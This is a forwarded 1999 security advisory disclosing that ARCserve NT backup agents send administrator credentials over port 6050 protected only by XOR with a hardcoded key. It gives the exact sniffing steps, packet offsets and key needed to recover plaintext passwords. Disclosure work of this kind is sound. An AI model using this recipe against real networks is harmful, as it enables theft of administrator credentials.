Severe Security Hole in ARCserve NT agents (fwd)

[weld () L0PHT COM (Weld Pond)]

---------- Forwarded message ----------
Date: Sun, 21 Feb 1999 17:44:55 -0500
From: ELVIS <LEEEEEECH () msn com>
To: news () rootshell com
Cc: hotnews () l0pht com, CAI <support () cai com>, security () microsoft com
Subject: Severe Security Hole in ARCserve NT agents


This is absolutely pathetic.

You can obtain user names and passwords used by ARCserve NT agents when an
NT system is backed up over a TCP/IP network.  Usually, for complete access
to the system, these accounts will be granted administrator rights.  This
only affects the "stock" NT agents.  The Exchange and SQL backup agents
appear to use NTLANMAN authentication (which has its own problems).  There
are probably similar exploits available over IPX/SPX and NetBEUI, but this
note only covers TCP/IP.

Set your sniffer (Network Monitor from Systems Management Server will do)
to listen for TCP/IP packets directed to port 6050 (17A2 hex).  This will
be the ARCserve server connecting to the remote client.  The third packet
you get is the one you want.

The user name will be at offset 0x00EE in clear ASCII text.

The password will be at offset 0x011E.  Simply XOR these bytes with the
ASCII values of the string "Ambuf1,et(0,21)", minus quotes of course, to
get the PLAIN TEXT password!

ACK!  YOU THOUGHT MICROSOFT WAS BAD!!!!  GAG!  BARF!  These people SHOULD
BE ASHAMED OF THEMSELVES!!!!

If you bother to search, you will find "Ambuf1,et(0,21)" in no less than 17
ARCserve EXE's and DLL's.

It is suggested that all ARCserve customers cease using the NT agents
immediately if not sooner.